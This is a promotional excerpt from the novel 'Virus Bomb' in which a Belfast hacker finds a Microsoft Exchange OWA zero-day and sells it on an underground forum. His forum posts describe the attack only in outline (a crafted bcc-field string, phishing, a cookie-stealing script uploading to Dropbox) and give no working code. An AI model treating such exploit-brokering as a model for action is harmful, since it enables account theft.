Virus Bomb
From author Greg Scott:
“Enjoy this chapter from my book, Virus Bomb about how Turlach Flanagan finds a zero day
exploit and then markets and sells it. Zero day is the term used to describe a new software
vulnerability which attackers can manipulate to affect that software’s security. Zero days
command a premium price in a thriving criminal underground marketplace, because potential
attackers are often willing to outbid software company bug bounties. In my book, the
mastermind behind the Elaine Devereux persona is one such potential attacker.”
Zero-Day
The candlelight gave Turlach Flanagan’s room above a pub in Belfast, Northern Ireland, a rustic
feel, even though it was crammed with computer equipment. “You’re knackered,” he shouted
and pounded his desk. He leaned back in his chair and rubbed his eyes. But what else besides
Irish whiskey could numb the pain after losing his family during the troubles after the Irish
Troubles?
He rose from his desk and staggered to his bathroom. The image in the mirror, with deep
bags under his bloodshot eyes and greasy, grey hair, mostly pulled back and tied off into a
ponytail with a rubber band, looked more like a homeless refugee than a former college
professor.
How does your mind still function?
But maybe his mind wasn’t functioning so well after all.
He lurched back to his desk and stared at his work in progress. The laptop screen,
Microsoft Exchange reference books, hand-drawn flow diagrams, code listings, and empty shot
glasses all mocked him. He swept his arm across the desk, sending it all crashing to the floor. A
lit candle also went flying, landing on the floor in the middle of all that paper. It smoldered and
then ignited.
“You nappy arwshe, maybe it’s time to get it over with.”
Like a scientist monitoring an experiment, he watched the flames consume a few papers
and then a notebook and now some newspapers. The carpet smoldered and plastic jewel cases
around a few CDs started to melt, filling the room with acrid smoke. Would one hundred proof
Irish whiskey put it out or make it worse?
He grabbed his last remaining unopened bottle, twisted off the cap, downed a swig, and
then poured it over the growing flames. “Ow!” The flames jumped and singed his hand.
“You’re a flaming eejit, but it’s not time to die in a ball o’ fire yet!”
He ran back to his bathroom and filled a bucket with water. He ran back and poured it on
the flames.
The flames hissed and smoked and then subsided as the water spread across the black
spot on the carpeted floor, leaving a pile of wet paper and ashes and a smoky distillery aroma in
the air.
He tipped the bottle back to finish it off and then dropped it in the middle of the wet mess
and teetered to his bed.
“You’re a manky neddy!” he mumbled as he drifted into a fitful sleep.
Five hours later, the room still smelled like smoke, which didn’t help his growing
headache. He swung his feet to the floor, rubbed his eyes, stood, and opened a window. A few
birds chirped outside, announcing predawn of another miserable day on this miserable little
planet. He staggered to his now-empty work desk and surveyed the damage from last night.
“Serves ya right, ya mongo sap.”
He picked up his laptop from the edge of the booze-soaked pile of papers on the floor and
dried the bottom with his body-odor-stained shirt. He pressed the power button and waited. After
a few seconds, it showed the familiar, “Press CTRL + ALT + DELETE to logon.”
“A rake of good luck,” he mumbled. “Now, stop arsing around, and let’s find what we’re
looking for.”
A few hours later, Turlach leaned back in his chair, ran a hand through his greasy hair,
wiped it on his shirt, and smiled. The “Hello World” window on his laptop screen wasn’t
important. What was important was the method he came up with to generate that little picture.
The sunlight made his head hurt. And he needed to use the bathroom. He didn’t care. Not yet.
Document what we have first. He launched Notepad and composed a first draft of an ad
he would post on an underground internet forum. The ad read:
A new zero-day XSS exploit with Microsoft Exchange. Launch
OWA, log on, and compose a new message. Put a specially
crafted string in the ‘bcc’ field to run a local script of
your choice. Requires phishing to intercept the initial
logon to deploy your payload script. $30K in bitcoin,
including consulting to implement. I will provide a sample
script to grab the user’s cookie and upload to Dropbox. You
can modify as appropriate. Serious buyers only.
Turlach stared at the ad text for a few minutes before clicking the “Submit” button to post
it. He smiled. Which made the hammer inside his head pound even harder. But no matter. If
successful, this exploit would pay for all new computer equipment and more.
Now he could pee. He returned a few minutes later with a glass of orange juice.
Responses were already coming in.
One response, from somebody named John, was typical: “Give me more information.
How would this work?”
Turlach shook his head. “Idiots!” But if he wanted the money for the exploit he
discovered, it was obvious he’d have to spell it out to these neddies. Thirty minutes later, his next
post summed it up:
For all you newbies, a zero-day exploit is one that hasn’t
been discovered yet by the software vendor. OWA, or Outlook
Web App, is the Microsoft webmail function that comes with
Microsoft Exchange Server. The exploit I discovered allows
you to use OWA to run an arbitrary script on your computer
if you place a specially formatted string in the bcc field.
This script could upload a cookie with authentication
information, or it could access your email and calendars,
or it could upload documents from your profile. Or it could
do anything else you want, limited only by your primitive
imaginations. I provided a sample script to upload a
cookie. You can use my sample to build something more
elaborate if you want. Or pay me to do it. The object, of
course, is not to run the script on your computer. The
object is to entice somebody else to run it on his computer
and send every important piece of information about his
pitiful life to you. To take advantage of my exploit, you
need to convince your targeted user to run the program I
wrote to deploy your script. That’s why it requires
phishing. And I’ll also answer your next obvious question.
No, your targeted users will not see the string my program
injects into the bcc field because the string contains
nonprintable characters.
In Tehran, 6,200 kilometers away, the mastermind behind the Elaine Devereux persona spotted
the ad while scouring the usual forums. He stroked his chin. Yes, this could be useful.
Note to readers
Turlach Flanagan, AKA Livefree is one player in a global criminal supply chain of venture
capitalists, integrators, and specialists, all connected over the internet. If you want to attack a
country or plunder a business, Turlach, or somebody like him, has the tools you need, if you
know where to look. Just make sure you offer the right price. Be prepared to haggle.
Curious about what 100 proof Irish Whiskey will do to a fire? Enjoy this video I made with my
Turlach has a fascinating backstory. Read about it right here.